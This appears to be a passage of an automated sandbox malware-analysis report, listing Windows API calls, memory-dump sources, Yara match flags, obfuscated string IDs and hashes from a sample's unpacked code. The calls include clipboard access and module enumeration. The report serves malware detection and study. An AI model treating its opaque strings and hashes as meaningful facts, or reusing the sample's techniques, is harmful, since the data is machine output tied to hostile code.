                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00414EFA
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00414F28
                                                                • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 3432729115-0
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00417A6A
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00417A98
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID:
                                                              • API String ID: 237503144-0
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0079E1FE
                                                              • Module32First.KERNEL32(00000000,00000224), ref: 0079E21E
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152378881.000000000079D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0079D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_79d000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 3833638111-0
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00000400,?,?,02120223,?,?), ref: 02120E19
                                                              • SetErrorMode.KERNELBASE(00000000,?,?,02120223,?,?), ref: 02120E1E
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              APIs
                                                              • RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 004372ED
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0043738D
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              APIs
                                                              • LdrInitializeThunk.NTDLL(0043A22C,005C003F,00000006,00120089,?,00000018,' !",00000000,004150CA), ref: 00437406
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0079DEE6
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152378881.000000000079D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0079D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_79d000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$Global$CloseDataInfoLockOpenUnlockWindow
                                                              • String ID: @$A$C$F
                                                              • API String ID: 3829817484-319984173
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .$.$0$Uh$C$Wn$[$false$null$true${$+$8o
                                                              • API String ID: 0-879020378
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !I$O$*M*S$-E>K$B5E;$I-@3$L9_?$W=WC$[)M/
                                                              • API String ID: 0-4068174152
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !I$O$*M*S$-E>K$B5E;$I-@3$L9_?$W=WC$[)M/
                                                              • API String ID: 0-4068174152
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID: "$"(B$0$5Q$B(B$P%B$b%B
                                                              • API String ID: 1279760036-2560538612
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$01$ZR\;$[hct${hmn
                                                              • API String ID: 0-1484469362
                                                              • Opcode ID: 46fbbb30a144e6cdf2b1d370ae05e1a5de9fab85d772feda1479b6a92d328fba
                                                              • Instruction ID: 529861c0716fe19863e499ceae189eb091099b04bbaf443b517289e78a7a57e6
                                                              • Opcode Fuzzy Hash: 46fbbb30a144e6cdf2b1d370ae05e1a5de9fab85d772feda1479b6a92d328fba
                                                              • Instruction Fuzzy Hash: 7E1202B02083818BE324CF58C4A4B6FBBE5BB86348F144D1CE5E58B291D77AD419CB92
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,DF3FD14C), ref: 02143FF4
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,DF3FD14C), ref: 0214401D
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,2FDE2DC1,00000009,00000000,00000000,?), ref: 02144434
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,2FDE2DC1,00000009,00000000,?,?), ref: 02144462
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID:
                                                              • API String ID: 237503144-0
                                                              • Opcode ID: 6721b5089de62f2581515a1f3700886ae7ab926132f011bbbe8c8f6fc0b297ab
                                                              • Instruction ID: cca6cc22778078e7f9dd0b3bc163f7ac1c82f9549c6120f132e177b8ba2d0ad7
                                                              • Opcode Fuzzy Hash: 6721b5089de62f2581515a1f3700886ae7ab926132f011bbbe8c8f6fc0b297ab
                                                              • Instruction Fuzzy Hash: 0D3246B4500B009FD728CF29C495B17BBB2FB85314F158A5CE8A64BB99D774E80ACBD1
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,00000000,?), ref: 00423D8D
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,?,?), ref: 00423DB6
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,00000000,?), ref: 004241CD
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,?,?), ref: 004241FB
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID:
                                                              • API String ID: 237503144-0
                                                              • Opcode ID: b0be70804cc91492d3ad46a995d1acc169f42f3db6c0a87da9a9870da7ebcf71
                                                              • Instruction ID: e81b59cdcbc34e311b7fbd4a7f811c95e6a6bbd50fbc0b950e223fe6d83b0846
                                                              • Opcode Fuzzy Hash: b0be70804cc91492d3ad46a995d1acc169f42f3db6c0a87da9a9870da7ebcf71
                                                              • Instruction Fuzzy Hash: 6D3257B4600B009FD728CF29C495B17BBB2FB85314F158A5DE8A64BB89D774E809CBD1
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,DF3FD14C), ref: 02143FF4
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,DF3FD14C), ref: 0214401D
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID:
                                                              • API String ID: 237503144-0
                                                              • Opcode ID: 217409ddc3c94f618525d253030682f72d4f3ca85dca1c4465c4694fb7a70ead
                                                              • Instruction ID: a24102de4b35eb4522df37065739374ea636957204b955ab014f31d20b0013da
                                                              • Opcode Fuzzy Hash: 217409ddc3c94f618525d253030682f72d4f3ca85dca1c4465c4694fb7a70ead
                                                              • Instruction Fuzzy Hash: 9C3245B4500B019FD728CF29C494B17BBB2BF85314F158A5CD8AA4BB99D774E80ACBD1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID: /V.W$2 B$J>;0$gdeb
                                                              • API String ID: 1279760036-1943473526
                                                              • Opcode ID: eb1d6880a56a5992fead70266ebc35c96466e4d3bb0734c4ddebee2a94e5caae
                                                              • Instruction ID: 1f1b32295078fd643b98cacce706d452a3674876845b3b7fea61ac9470719d4c
                                                              • Opcode Fuzzy Hash: eb1d6880a56a5992fead70266ebc35c96466e4d3bb0734c4ddebee2a94e5caae
                                                              • Instruction Fuzzy Hash: A1D18AB56083518FC724CF28D89072BBBE1BFCA314F954A6DE89987391D774E901CB86
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #M*O$.A+C$<Y9[$de
                                                              • API String ID: 0-619215113
                                                              • Opcode ID: 511338df0e01b7e020f68d2e2ffe54247379295d5db2bf8c1464e1bb9d8b3272
                                                              • Instruction ID: 580bd4013385b26f177361563e41567742c205b285c4bed5281630de06e45ec6
                                                              • Opcode Fuzzy Hash: 511338df0e01b7e020f68d2e2ffe54247379295d5db2bf8c1464e1bb9d8b3272
                                                              • Instruction Fuzzy Hash: FA4189B46483958BC328CF04C0907ABB7F1FF86314F915A1CE8DA5B790DBB59846CB86
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 2PBb$Yceh$]hW9
                                                              • API String ID: 0-1551782443
                                                              • Opcode ID: 734dabc05ea60f004194020b556aab606ea901bc42e275c09313137895361325
                                                              • Instruction ID: 514f76bfff57c2ad55ef6650a00a8fbeb55136913e92a8c849dc966121d3666f
                                                              • Opcode Fuzzy Hash: 734dabc05ea60f004194020b556aab606ea901bc42e275c09313137895361325
                                                              • Instruction Fuzzy Hash: 7C924B70144B808EE7268F35C4A47E3BBE1BF16309F48499DD5EF8B282DB79610ACB51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 7452$7452$JlRp
                                                              • API String ID: 0-3284767125
                                                              • Opcode ID: 413a8c3097bd0bbed46b622d8ebfbae3443f36cf74166f8203eafa5a1eed2870
                                                              • Instruction ID: 2bf2174bfb8aa8be00586c2a2f454ad86fd7b9a24956909892c521b900fd6fd1
                                                              • Opcode Fuzzy Hash: 413a8c3097bd0bbed46b622d8ebfbae3443f36cf74166f8203eafa5a1eed2870
                                                              • Instruction Fuzzy Hash: F5529E70244B818FE339CF29C4A07A6BBE6BF56308F54895DC4EB8B785CB75A409CB51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: 7452$7452$JlRp
                                                              • API String ID: 2994545307-3284767125
                                                              • Opcode ID: 92cc4ae05945aba4e668405ce1423f3846cc19dc5b7ecfea896f74c89be008a8
                                                              • Instruction ID: e650c655e12bce7b67b4aee498b20d7031e1d261d0f6e781b1df18e503fb0051
                                                              • Opcode Fuzzy Hash: 92cc4ae05945aba4e668405ce1423f3846cc19dc5b7ecfea896f74c89be008a8
                                                              • Instruction Fuzzy Hash: 5F52AC70205B908BE325CF29D5907A3BBE2BF56304F948A5EC4DB8B785C739B409CB59
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ' !"$R-,T$R-,T
                                                              • API String ID: 0-1082949730
                                                              • Opcode ID: a0d8ec2e41ee8f33b9d3bae5825d1913e48ad55aa89737e13fc6d60f7e4d6ede
                                                              • Instruction ID: 91f5837c4f96479d609c5eb808463228a3f759c63849d30c845159d8e2f6a9a8
                                                              • Opcode Fuzzy Hash: a0d8ec2e41ee8f33b9d3bae5825d1913e48ad55aa89737e13fc6d60f7e4d6ede
                                                              • Instruction Fuzzy Hash: 77B1AD75A08321CBC724CF18C490A6BB7E2FF88758F18865CE8A95B365D734DD11CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ' !"$R-,T$R-,T
                                                              • API String ID: 0-1082949730
                                                              • Opcode ID: 7a4f43ee0880b98fbdcda669b16d56030fa70b8b446607e2e012461912b396b9
                                                              • Instruction ID: 9bdbef18e09c284a1484a8fdec6c79e1bfd0a8a4d41465c41f0146dce1d37148
                                                              • Opcode Fuzzy Hash: 7a4f43ee0880b98fbdcda669b16d56030fa70b8b446607e2e012461912b396b9
                                                              • Instruction Fuzzy Hash: 19B1BD75A083118BC724CF18C49076BB7E2FF88354F19866DE9995B391DB38EC11CB9A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$8
                                                              • API String ID: 0-46163386
                                                              • Opcode ID: 046fdc3f4dc3473bab3f86822898e036eb9f245eac020c489728bed56faa6f3a
                                                              • Instruction ID: a6ab4bbeba9c49c707536051111afc28ad7ef00f64fe91665653d2bbfc14cd96
                                                              • Opcode Fuzzy Hash: 046fdc3f4dc3473bab3f86822898e036eb9f245eac020c489728bed56faa6f3a
                                                              • Instruction Fuzzy Hash: 16826971608351AFD724CF18C88075ABBE2BF88318F48892DF99987391D375D968CF92
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$8
                                                              • API String ID: 0-46163386
                                                              • Opcode ID: a65c4e76ea57bbfc46f0087fecdd1749cb0d7a49674b239ba6b424def3ae107b
                                                              • Instruction ID: dc0667dd8dba82da45780d667ad4d2091edccb94f5c689a9349702639bf5c4e6
                                                              • Opcode Fuzzy Hash: a65c4e76ea57bbfc46f0087fecdd1749cb0d7a49674b239ba6b424def3ae107b
                                                              • Instruction Fuzzy Hash: CF8213716087419FD720CF28C884B9BBBE1EF88314F44892EE989A7391D379D954CF96
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 7452$JlRp
                                                              • API String ID: 0-1201309010
                                                              • Opcode ID: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                              • Instruction ID: df22bc4e3510e27ca2f3f1fe3302ea763bb81e2c43c646472f5aab86a75570e1
                                                              • Opcode Fuzzy Hash: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                              • Instruction Fuzzy Hash: DDF16070644B818FD3398F25C0647A3BBE1BF56308F54896DC5EF8B685CB79A009CB51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 7452$JlRp
                                                              • API String ID: 0-1201309010
                                                              • Opcode ID: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                              • Instruction ID: 26763a119934df737aef44f96d102629e4e06364a32b506b5a4d198ec9095851
                                                              • Opcode Fuzzy Hash: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                              • Instruction Fuzzy Hash: C0F19E70205B508FE329CF25D0A43A3BBE1BF56304F95896EC4EB8B785C739A449CB55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 7452$JlRp
                                                              • API String ID: 0-1201309010
                                                              • Opcode ID: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                              • Instruction ID: 6dde2407734d44b6b340366c27aa181bd6e2e71507cf76f10d97dd8eef7acb7a
                                                              • Opcode Fuzzy Hash: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                              • Instruction Fuzzy Hash: C7F150B0645B818FD3398F25C0647A3BBE1BB56308F54896DC4EF8B685CB79A049CB51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 7452$JlRp
                                                              • API String ID: 0-1201309010
                                                              • Opcode ID: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                              • Instruction ID: 3e43ac3292e75d8b218afd9fd32b7d1e5bc91179cd9b43390289dad712848b02
                                                              • Opcode Fuzzy Hash: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                              • Instruction Fuzzy Hash: 02F19E70205B508FE329CF25D0A43A3BBE1BF56304F94896EC4EB8B785CB79A449CB55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: )$IEND
                                                              • API String ID: 0-707183367
                                                              • Opcode ID: 5fae8bd4bad633f51bc3bcaf9a54da298bfdb29abebaaaac5eab5c9fa3e9b1eb
                                                              • Instruction ID: 512ced44bcb5ee94b2d7ba64b25825ddf973fe893be120d97b4394cd45f3d4dc
                                                              • Opcode Fuzzy Hash: 5fae8bd4bad633f51bc3bcaf9a54da298bfdb29abebaaaac5eab5c9fa3e9b1eb
                                                              • Instruction Fuzzy Hash: 3AE1D0B2A483649FD714CF28C88075EBBE1EF94304F05852DF9999B381D779E918CB92
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 7452$JlRp
                                                              • API String ID: 0-1201309010
                                                              • Opcode ID: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                              • Instruction ID: e8f93c848bc0fda11aaf45b3497070915b17eba1a6525841d0e471b14c32cb4b
                                                              • Opcode Fuzzy Hash: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                              • Instruction Fuzzy Hash: 3ED18EB0245B808FE3298F25C0A47A3BBE6BF57309F48895DC4EF4B685CB796049CB51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 7452$JlRp
                                                              • API String ID: 0-1201309010
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ]hiX$gdeb
                                                              • API String ID: 0-4273025081
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gdeb$gdeb
                                                              • API String ID: 0-1883251077
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gdeb$gdeb
                                                              • API String ID: 0-1883251077
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ' !"
                                                              • API String ID: 0-2098420348
                                                              Strings
